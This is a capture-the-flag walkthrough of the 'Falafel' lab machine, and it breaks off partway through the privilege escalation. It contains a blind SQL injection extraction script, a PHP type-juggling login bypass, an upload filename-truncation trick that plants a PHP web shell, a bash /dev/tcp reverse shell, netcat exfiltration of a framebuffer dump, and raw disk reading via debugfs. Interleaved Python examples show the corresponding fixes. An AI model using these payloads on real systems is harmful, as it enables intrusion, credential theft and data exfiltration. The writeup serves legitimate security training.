# Falafel

<figure><img src="/files/a5l5bHBuk3L6VCA2512a" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and find out which services and versions are running on them.

The following nmap command quickly scans the target machine for open ports and saves the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.73 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Tue Nov 15 18:23:28 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.73
Nmap scan report for 10.10.10.73
Host is up (0.065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Tue Nov 15 18:23:42 2022 -- 1 IP address (1 host up) scanned in 13.47 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:

> nmap -sC -sV -p22,80 10.10.10.73 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Tue Nov 15 18:23:59 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.73
Nmap scan report for 10.10.10.73
Host is up (0.037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 36c00a2643f8cea82c0d192110a6a8e7 (RSA)
|   256 cb20fdffa880f2a24b2bbbe17698d0fb (ECDSA)
|_  256 c4792bb6a9b7174c0740f3e57c1ae9dd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 15 18:24:37 2022 -- 1 IP address (1 host up) scanned in 38.60 seconds
```

{% endcode %}

There is just a welcome message on the website.

<figure><img src="/files/oufzyZoxlcdA4Ahe6CTG" alt=""><figcaption></figcaption></figure>

The `robots.txt` file contains the disallow entry `/*.txt`.

<figure><img src="/files/boAEJTngMqCdJLmrNVTJ" alt=""><figcaption></figcaption></figure>

Let's try to list any subdirectories or any `.txt` and `.php` files hidden in the website.

> gobuster dir -u <http://10.10.10.73/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of concurrent **threads**, in this case 200 threads.

```
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.73/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
2022/11/16 22:53:21 Starting gobuster in directory enumeration mode
===============================================================
/profile.php          (Status: 302) [Size: 9787] [--> login.php]
/images               (Status: 301) [Size: 311] [--> http://10.10.10.73/images/]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.73/uploads/]
/header.php           (Status: 200) [Size: 288]
/assets               (Status: 301) [Size: 311] [--> http://10.10.10.73/assets/]
/footer.php           (Status: 200) [Size: 0]
/upload.php           (Status: 302) [Size: 0] [--> profile.php]
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.73/css/]
/style.php            (Status: 200) [Size: 6174]
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.73/js/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/robots.txt           (Status: 200) [Size: 30]
/cyberlaw.txt         (Status: 200) [Size: 804]
/connection.php       (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 290]
===============================================================
2022/11/16 22:55:28 Finished
===============================================================
```

The `/cyberlaw.txt` file says that there is a way to log in to the site as the `admin` user, and also a way to get into the server through the image upload feature.

<figure><img src="/files/sTLJ9cFAqavQlvg9AOQn" alt=""><figcaption></figcaption></figure>

## Exploitation

If we try to log in as the `admin` user with random credentials, we'll get the error `Wrong identification : admin`.

<figure><img src="/files/D4nqZ029DzVaMLIWJESX" alt=""><figcaption></figcaption></figure>

But, if we try to log in as some random user, we will get the error `Try again..`.

<figure><img src="/files/LDPuSYAQPMz2nvdpxdSa" alt=""><figcaption></figcaption></figure>

If we try to log in with an SQL injection payload, we'll get the error `Wrong identification : admin`, which means that the injected query is valid and returned a row.

> ' or 1=1-- -

<figure><img src="/files/JShqiL9IorAvimjO6Iwh" alt=""><figcaption></figcaption></figure>

We can't bypass the login page, but we can make the application evaluate SQL conditions: if the error is `Wrong identification : admin` the injected condition is true, and if the error is `Try again..` it is false, so what we have is a *boolean-based blind SQL injection*. If we start enumerating the database with the UNION statement as usual, we get the error `Hacking Attempt Detected!`.

> ' union select 1-- -

<figure><img src="/files/e87VVeQZ9KOdWXKGPf6f" alt=""><figcaption></figcaption></figure>

But there are other ways of enumerating a database. The following query checks whether the first character of the `admin` username is an `a`. As the comparison is true, we should get the error `Wrong identification : admin`.

> admin' and substring(username,1,1)='a'-- -

<figure><img src="/files/xsiMNoKvYwLNvHQZyRe3" alt=""><figcaption></figcaption></figure>
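The oracle described above, modelled locally as an added example (this is not code from the writeup): an in-memory SQLite table stands in for the site's users table (layout constructed; the two stored hashes and the error strings are the ones the page reports), `login_vulnerable` concatenates the username into the query and answers with two different errors, and `login_fixed` uses a bound parameter and a single generic error. `recover_hash` replays the page's one-character-at-a-time probe against either login function, so it doubles as a regression test: it recovers the full digest from the vulnerable version and nothing from the fixed one. SQLite's `substr()` stands in for MySQL's `substring()`.

```python
import hashlib
import hmac
import sqlite3

# Error strings exactly as the page reports them.
WRONG_ID = "Wrong identification : {user}"
TRY_AGAIN = "Try again.."
GENERIC = "Invalid username or password"

ADMIN_HASH = "0e462096931906507119562988736854"  # stored hash from the page
CHRIS_HASH = "d4ee02a22fc872e36d9e3751ba72ddc8"  # stored hash from the page


def make_db():
    """In-memory SQLite stand-in for the site's users table (constructed layout)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", ADMIN_HASH), ("chris", CHRIS_HASH)])
    return db


def login_vulnerable(db, username, password):
    """Concatenates the username into the query and leaks whether a row matched."""
    query = f"SELECT username, password FROM users WHERE username='{username}'"
    row = db.execute(query).fetchone()
    if row is None:
        return TRY_AGAIN                        # no row: injected condition was false
    digest = hashlib.md5(password.encode()).hexdigest()
    if row[1] == digest:
        return f"Logged in as {row[0]}"
    return WRONG_ID.format(user=row[0])         # row found: injected condition was true


def login_fixed(db, username, password):
    """Parameterised query and one generic failure message: nothing to ask the oracle."""
    row = db.execute("SELECT username, password FROM users WHERE username=?",
                     (username,)).fetchone()
    digest = hashlib.md5(password.encode()).hexdigest()  # unsalted md5 kept only to match the page
    if row is not None and hmac.compare_digest(row[1], digest):
        return f"Logged in as {row[0]}"
    return GENERIC


def recover_hash(db, login, username, charset="0123456789abcdef", length=32):
    """Replays the page's character-by-character probe against a login function
    and returns whatever it could recover (empty when there is no oracle)."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            probe = f"{username}' and substr(password,{pos},1)='{ch}'-- -"
            if "identification" in login(db, probe, "test"):
                recovered += ch
                break
        else:
            break                               # no character matched: stop
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 1=1-- -", "x"))   # Wrong identification : admin
    print("vulnerable:", recover_hash(db, login_vulnerable, "admin"))
    print("fixed:     ", repr(recover_hash(db, login_fixed, "admin")))
```

The two defensive changes are independent: the bound parameter stops the injected condition from ever reaching the SQL engine, and the single generic message removes the true/false signal even if some other query on the site is still vulnerable.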

I made the following script in Python, which guesses all the characters of the password hash stored in the database following the previous logic.

```python
#!/usr/bin/env python3
import signal
import sys
import time

import requests
from pwn import log


def def_handler(sig, frame):
    print("[!] Quitting...")
    sys.exit(1)


# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

# Variables
url = "http://10.10.10.73/login.php"


def makeRequest():
    characters = '0123456789abcdefghijklmnopqrstuvwxyz'
    username = "admin"  # change to "chris" to recover the second hash
    password = ""
    counter = 1

    p1 = log.progress("Brute Force")
    p1.status("Brute forcing...")
    time.sleep(1)

    p2 = log.progress("Password hash: ")

    while True:
        for char in characters:

            p1.status("Trying with the %c character" % char)

            # Boolean oracle: "Wrong identification" means a row was returned,
            # i.e. the substring comparison for this position was true.
            post_data = {
                "username": username + f"' and substring(password,{counter},1)='{char}' -- -",
                "password": "test",
            }

            r = requests.post(url, data=post_data, allow_redirects=False)

            if "identification" in r.text:
                password += char
                counter += 1
                p2.status(password)
                break
        else:
            # No character matched at this position: the hash is complete.
            p2.success(password)
            break


if __name__ == '__main__':
    makeRequest()
```

If we run the script, we'll see that the password hash for the admin user is `0e462096931906507119562988736854`.

> python script.py

```
[....\...] Brute Force: Trying with the 2 character
[d] Password hash: : 0e462096931906507119562988736854
```

But we can't crack the hash, and it is not available in any rainbow table.

<figure><img src="/files/1ccCZuSWkxtiRVVDiGmD" alt=""><figcaption></figcaption></figure>

But, if you remember, in `/cyberlaw.txt` there was another user called `chris`. Let's try to get his password hash. Make sure to change the `username` variable to `chris`.

> python script.py

```
[O] Brute Force: Trying with the 0 character
[o] Password hash: : d4ee02a22fc872e36d9e3751ba72ddc8
```

We got a new hash, and this time it is available in the rainbow tables.

<figure><img src="/files/04OKOcAtXS0a7hESOKzP" alt=""><figcaption></figcaption></figure>

Let's log in as the `chris` user.

<figure><img src="/files/zrsM4oMjD6P2jho8rU4r" alt=""><figcaption></figcaption></figure>

The welcome message puts a lot of emphasis on juggling, so maybe we have to exploit a *type juggling* attack. If the login page is vulnerable, it compares the stored hash of the admin user with the *md5* hash of our password input using the loose `==` comparison. The admin password hash starts with `0e` followed only by digits, so PHP treats it as a numeric string in scientific notation: 0 times a power of ten, which is equal to 0.

> php --interactive
>
> php > if ("0e462096931906507119562988736854" == 0) { echo "equal"; } else { echo "not equal"; }

```
equal
```

So if we log in with a password whose hash starts with `0e` and contains only digits after that, it will also evaluate to 0, just like the hash of the `admin` user, and we'll be able to log in as `admin`.

This [article](https://news.ycombinator.com/item?id=9484757) shows a few strings whose hashes have the form we are looking for. Let's log in with the password `240610708`.

<figure><img src="/files/gdpN3dAICT4bg2EIvTEi" alt=""><figcaption></figcaption></figure>

Now we are logged in as `admin`.

<figure><img src="/files/t4oSEUVGJN0q46FsyYm3" alt=""><figcaption></figcaption></figure>
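The loose comparison explained above, modelled in Python as an added example (not code from the writeup or from the Falafel application): `php_loose_eq` reproduces PHP's `==` for two strings (numeric strings are compared as numbers, which holds in PHP 5, 7 and 8), `check_loose` is the comparison the page infers `login_logic.php` performs, `check_strict` is the fix (`hash_equals()` in PHP, `hmac.compare_digest()` here), and `audit_stored_hashes` is a constructed helper a defender can run over a user table to find digests that PHP would read as the number zero. The numeric-string regular expression is a simplification of PHP's rule that is exact for hex digests.

```python
import hashlib
import hmac
import re

# PHP's numeric-string form (digits, optional fraction, optional exponent).
# A hex digest matches only if it consists of digits, or of '0e' + digits.
NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")
MAGIC = re.compile(r"^0e\d+$")

ADMIN_HASH = "0e462096931906507119562988736854"   # stored hash from the page


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP's `$a == $b` for two strings: if both are numeric strings
    they compare as numbers, otherwise byte-wise."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)      # "0e462..." -> 0.0
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def check_loose(stored: str, candidate: str) -> bool:
    """What the page infers the login does: md5($input) == $stored."""
    return php_loose_eq(stored, md5_hex(candidate))


def check_strict(stored: str, candidate: str) -> bool:
    """The fix: a byte-wise, constant-time comparison. '0e...' is then just
    another 32-character string."""
    return hmac.compare_digest(stored, md5_hex(candidate))


def is_magic_hash(digest: str) -> bool:
    """True when PHP's loose comparison would read the digest as 0."""
    return MAGIC.match(digest) is not None


def audit_stored_hashes(rows):
    """Return the usernames whose stored digest has the 0e<digits> form;
    `rows` is an iterable of (username, hex_digest). Constructed helper."""
    return [user for user, digest in rows if is_magic_hash(digest)]


if __name__ == "__main__":
    print("loose :", check_loose(ADMIN_HASH, "240610708"))    # True
    print("strict:", check_strict(ADMIN_HASH, "240610708"))   # False
    print("magic accounts:", audit_stored_hashes([("admin", ADMIN_HASH)]))
```

Note that the strict comparison only removes the juggling bug; an unsalted md5 is still not an acceptable password hash, and the audit is a way to find accounts that need a reset while that is being replaced.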

Now, there might be a way to get access to the server through this upload feature. Let's test it. First, set up a simple HTTP server with python.

> python -m http.server 80

Now, create a file called `test.png`.

> touch test.png

Now, click on `Upload`, then intercept the request with *BurpSuite*, and send it to the *Repeater*. Then, send a request with the following value as the `url` parameter.

<figure><img src="/files/UStc6pKXYGHurj4USFnj" alt=""><figcaption></figcaption></figure>

As you can see, the file got downloaded. The server stores the file inside a randomly named directory. We could try to upload `.php` files.

> touch test.php

<figure><img src="/files/GRPH9YBuYHHBlfAnyp7B" alt=""><figcaption></figcaption></figure>

But we are not allowed to do that. On Linux, filenames can't be longer than 255 bytes. So what happens if we try to upload a file whose name is exactly 255 bytes long? Let's check it out. First, let's create a pattern of 251 bytes, as we do in buffer overflows.

> msf-pattern\_create -l 251

{% code overflow="wrap" %}

```
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai
```

{% endcode %}

Now, create a file named after the pattern with the `.png` extension, so its name is 255 bytes long and we are allowed to upload it.

> touch Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.png

Now, upload it to the website.

<figure><img src="/files/OO20CmDuW97IFycHto1R" alt=""><figcaption></figcaption></figure>

As we can see, we were able to upload the file, but the filename got shortened. There must be some kind of job shortening filenames when they are too long.

Something we can do is find the exact length at which the name gets cut, then upload a file whose name is `offset-4` characters followed by the `.php.png` extension. The extension check sees `.png`, so the upload is accepted, and the shortening job then cuts off the `.png` part, leaving a `.php` file with our code on the server. First, calculate the offset. As you can see, the last 4 characters of the shortened file are `Ah7A`.

> echo -n "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah" | wc -c

```
236
```

Now, create a new pattern with `236-4` characters.

> msf-pattern\_create -l 232

{% code overflow="wrap" %}

```
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A
```

{% endcode %}

Create a file with that name and the `.php.png` extension, and write some malicious code in it.

> nano Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php.png

```php
<?php echo system($_GET['cmd']); ?>
```

If we upload the file, we'll see that the server cut off the `.png` part, and it stored a `.php` file in the `/uploads/1117-2156_6e68af9e0ef8c74a` directory.

<figure><img src="/files/MOhmRV9J3cfYJFCdObDf" alt=""><figcaption></figcaption></figure>
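The validate-then-shorten ordering that makes the bypass above work, as an added example (not code from the writeup; the real `upload.php` was not available, so both handlers are constructed). `MAX_NAME = 236` is an assumption inferred from the page's `236-4` arithmetic and the 236-character name that ended up on disk, and the extension allow-list is assumed. `store_vulnerable` checks the extension and then shortens the name, so the name actually written can end in an extension that was never checked; `store_fixed` rejects over-long names, checks the extension of the name that will really be written, and generates the on-disk name server-side so the client never chooses it. `find_unexpected` is the corresponding check a defender can run over an existing upload directory.

```python
import os
import secrets

ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}   # assumed allow-list
MAX_NAME = 236   # assumed: inferred from the page's 236 - 4 = 232 offset arithmetic


def shorten(name: str, limit: int = MAX_NAME) -> str:
    """The shortening job the page observed: keep only the first `limit` characters."""
    return name[:limit]


def final_extension(stored_name: str) -> str:
    return os.path.splitext(stored_name)[1].lower()


def store_vulnerable(name: str) -> str:
    """Checks the extension first, then shortens: the stored name can end in
    an extension that was never validated."""
    if final_extension(name) not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return shorten(name)


def store_fixed(name: str) -> str:
    """Validate the name that will really be written and do not let the client
    pick it: reject names longer than the limit (so nothing is ever cut),
    allow-list the final extension, and generate the on-disk name."""
    base = os.path.basename(name)                 # drop any path component
    if len(base.encode()) > MAX_NAME:
        raise ValueError("filename too long")
    ext = final_extension(base)
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return secrets.token_hex(8) + ext             # server-chosen name


def accepted(store, name: str) -> bool:
    """True if `store` accepts the upload, False if it rejects it."""
    try:
        store(name)
        return True
    except ValueError:
        return False


def find_unexpected(stored_names) -> list:
    """Files in an upload directory whose extension is outside the allow-list."""
    return sorted(n for n in stored_names if final_extension(n) not in ALLOWED_EXTENSIONS)


# Constructed stand-in for the page's 232-character pattern plus ".php.png".
LONG_NAME = "A" * (MAX_NAME - len(".png")) + ".php.png"

if __name__ == "__main__":
    print("vulnerable stores:", final_extension(store_vulnerable(LONG_NAME)))   # .php
    print("fixed accepts long name:", accepted(store_fixed, LONG_NAME))        # False
```

Whatever the limit really is, the rule is the same: the extension check must run on the string that reaches the filesystem, and the shortest way to guarantee that is to never write a client-supplied name at all.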

Now, if we access the PHP file, we'll be able to run commands using the `cmd` parameter.

> curl "http://10.10.10.73/uploads/1117-2156\_6e68af9e0ef8c74a/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php?cmd=whoami"

```
www-data
```

Let's get a reverse shell. First, set up a listener on port *4444* with *netcat*.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Now, send the reverse shell.

> curl "http://10.10.10.73/uploads/1117-2156\_6e68af9e0ef8c74a/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php?cmd=bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/10.10.14.14/4444%200>%261'"

```
Listening on 0.0.0.0 4444
Connection received on 10.10.10.73 50354
bash: cannot set terminal process group (1303): Inappropriate ioctl for device
bash: no job control in this shell
www-data@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ whoami
whoami
www-data
```

## Privilege Escalation

First, let's get an interactive *TTY* shell.

> script /dev/null -c /bin/bash

Then I press `Ctrl+Z` and execute the following commands on my local machine:

> stty raw -echo; fg
>
> reset
>
> Terminal type? xterm

Next, I export a few variables:

> export TERM=xterm
>
> export SHELL=bash

Finally, I run the following command on our local machine:

> stty size

```
51 236
```

And set the proper dimensions in the victim machine:

> stty rows 51 columns 236

Let's check the system users.

> grep sh /etc/passwd

```
root:x:0:0:root:/root:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
yossi:x:1000:1000:Yossi,,,:/home/yossi:/bin/bash
moshe:x:1001:1001::/home/moshe:
```

If we check the `/var/www/html` directory, we'll see a file called `connection.php`.

> ls -la /var/www/html

```
total 92
drwxr-x---  7 root www-data 4096 Sep 13 18:51 .
drwxr-xr-x  3 root root     4096 Sep 13 18:51 ..
-rwxr-xr--  1 root www-data   41 Oct 29  2017 .htaccess
drwxr-xr--  2 root www-data 4096 Oct 29  2017 assets
-rwxr-xr--  1 root www-data  423 Oct 29  2017 authorized.php
-rwxr-xr--  1 root www-data  377 Nov 28  2017 connection.php
drwxr-xr--  2 root www-data 4096 Nov 28  2017 css
-rwxr-xr--  1 root www-data  804 Nov 27  2017 cyberlaw.txt
-rwxr-xr--  1 root www-data    0 Nov 27  2017 footer.php
-rwxr-xr--  1 root www-data 1140 Nov 27  2017 header.php
-rwxr-xr--  1 root www-data 7335 Aug 13  2015 icon.png
drwxr-xr--  2 root www-data 4096 Nov 27  2017 images
-rwxr-xr--  1 root www-data  818 Nov 28  2017 index.php
drwxr-xr--  2 root www-data 4096 Nov 28  2017 js
-rwxr-xr--  1 root www-data  752 Oct 29  2017 login.php
-rwxr-xr--  1 root www-data 1800 Nov 28  2017 login_logic.php
-rwxr-xr--  1 root www-data  107 Oct 29  2017 logout.php
-rwxr-xr--  1 root www-data 1913 Nov 28  2017 profile.php
-rwxr-xr--  1 root www-data   30 Nov 28  2017 robots.txt
-rwxr-xr--  1 root www-data 6174 Nov 28  2017 style.php
-rwxr-xr--  1 root www-data 3647 Nov 28  2017 upload.php
drwxrwxr-- 10 root www-data 4096 Nov 17 21:56 uploads
```

That file contains credentials for the *MySQL* database.

> cat /var/www/html/connection.php

```php
<?php
   define('DB_SERVER', 'localhost:3306');
   define('DB_USERNAME', 'moshe');
   define('DB_PASSWORD', 'falafelIsReallyTasty');
   define('DB_DATABASE', 'falafel');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
   // Check connection
   if (mysqli_connect_errno())
   {
      echo "Failed to connect to MySQL: " . mysqli_connect_error();
   }
?>
```

And that password is also valid for the `moshe` user, so we can grab the user flag.

> su moshe

```
Password: falafelIsReallyTasty
setterm: terminal xterm does not support --blank
moshe@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ whoami
moshe
moshe@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ cd
moshe@falafel:~$ cat user.txt 
1a203d14a3460277a12d5b33b0c734d5
```

By checking which groups `moshe` is a member of, we'll see that he is a member of the `video` group.

> id

{% code overflow="wrap" %}

```
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
```

{% endcode %}

A member of the `video` group can read the framebuffer device, which amounts to taking a screenshot of the console. First, we'll need to find the proper virtual device.

> find / -group video 2>/dev/null

```
/dev/fb0
/dev/dri/card0
/dev/dri/renderD128
/dev/dri/controlD64
```

Now, copy the contents of the `/dev/fb0` device into the `/tmp` directory.

> cp /dev/fb0 /tmp/

Let's transfer that file to our local machine. Set a `netcat` listener on port `5555`, pointing to `fb0.raw`.

> nc -lvnp 5555 > fb0.raw

Then, on the `falafel` machine, send the file with `netcat`.

> nc 10.10.14.14 5555 < fb0

Now, we need to know the screen dimensions of the victim machine.

> echo "Width:"; cat /sys/class/graphics/fb0/virtual\_size | cut -d, -f1; echo " Heigth:"; cat /sys/class/graphics/fb0/virtual\_size | cut -d, -f2

```
Width: 
1176
Heigth: 
885
```

On our local machine, create the `video.pl` script with the following code.

> nano video.pl

```perl
#!/usr/bin/perl -w
# Converts a raw 16-bit RGB565 framebuffer dump (as read from /dev/fb0)
# into a PNG by piping a binary PPM (P6) stream through pnmtopng.
# Usage: perl video.pl WIDTH HEIGHT < fb0.raw > fb0.png

$w = shift || 240;          # width in pixels (default 240)
$h = shift || 320;          # height in pixels (default 320)
$pixels = $w * $h;

open OUT, "|pnmtopng" or die "Can't pipe pnmtopng: $!\n";

# PPM header: magic number, width and height, maximum sample value.
printf OUT "P6\n%d %d\n255\n", $w, $h;

# Each pixel is a native-endian 16-bit value: 5 bits red, 6 green, 5 blue.
while ((read STDIN, $raw, 2) and $pixels--) {
   $short = unpack('S', $raw);
   print OUT pack("C3",
      ($short & 0xf800) >> 8,   # red   (top 5 bits, scaled to 8)
      ($short & 0x7e0) >> 3,    # green (middle 6 bits)
      ($short & 0x1f) << 3);    # blue  (low 5 bits)
}

close OUT;
```

Finally, let's run the script with the width and height as parameters.

> perl video.pl 1176 885 < fb0.raw > fb0.png

If we take a look at the `fb0.png` screenshot, we'll see that the user `yossi` is changing his password to `MoshePlzStopHackingMe!`.

<figure><img src="/files/REaZyJSr2yHxhne8ZjnQ" alt=""><figcaption></figcaption></figure>

Let's become the `yossi` user.

> su yossi

```
Password: MoshePlzStopHackingMe!
yossi@falafel:/tmp$ whoami
yossi
```

If we check the `yossi` groups, we'll see that he is a member of the `disk` group.

> id

{% code overflow="wrap" %}

```
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)
```

{% endcode %}

As we are in the `disk` group, we can read the hard drive devices directly, regardless of file permissions.

> fdisk -l

```
Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x2aa34854

Device     Boot   Start     End Sectors  Size Id Type
/dev/sda1          2048 7337983 7335936  3.5G 83 Linux
/dev/sda2       7337984 8388607 1050624  513M  5 Extended
/dev/sda5       7340032 8388607 1048576  512M 82 Linux swap / Solaris
```

It looks like the filesystem is stored in `/dev/sda1`. Let's take a look at it.

> debugfs /dev/sda1
>
> debugfs: ls

```
 2  (12) .    2  (12) ..    11  (20) lost+found    131073  (12) etc   
 31  (16) media    131075  (12) bin    426  (12) boot    2091  (12) dev   
 12  (12) home    13  (12) lib    2451  (16) lib64    2453  (12) mnt   
 2454  (12) opt    2455  (12) proc    2456  (12) root    2459  (12) run   
 2472  (12) sbin    2589  (12) srv    2590  (12) sys    2591  (12) tmp   
